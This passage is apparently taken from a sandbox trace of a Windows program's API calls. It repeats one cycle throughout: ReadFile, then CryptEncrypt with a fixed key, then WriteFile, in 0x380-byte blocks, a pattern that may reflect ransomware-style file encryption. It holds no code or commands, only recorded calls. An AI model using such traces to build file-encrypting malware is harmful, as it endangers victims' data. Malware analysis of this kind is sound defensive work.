lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.063] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.063] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.064] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.064] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.064] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.064] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.064] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.064] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.064] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.064] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.064] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.064] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.064] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.064] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.064] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.064] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.064] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.064] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.064] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.064] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.064] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.065] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.065] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.065] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.065] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.065] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.065] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.067] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.067] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.067] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.068] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.068] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.068] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.068] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.068] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.068] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.068] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.068] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.068] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.068] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.068] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.068] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.069] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.069] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.069] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.069] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.069] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.069] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.069] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.069] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.069] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.069] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.069] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.069] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.069] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.069] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.070] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.070] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.070] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.070] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.070] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.070] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.070] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.070] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.070] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.070] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.071] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.071] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.071] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.071] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.071] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.071] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.071] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.071] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.071] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.071] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.071] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.071] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.071] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.071] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.072] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.072] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.072] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.072] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.072] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.072] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.072] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.072] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.072] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.072] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.072] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.072] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.073] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.073] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.073] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.073] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.073] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.073] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.073] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.073] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.073] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.073] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.073] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.073] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, 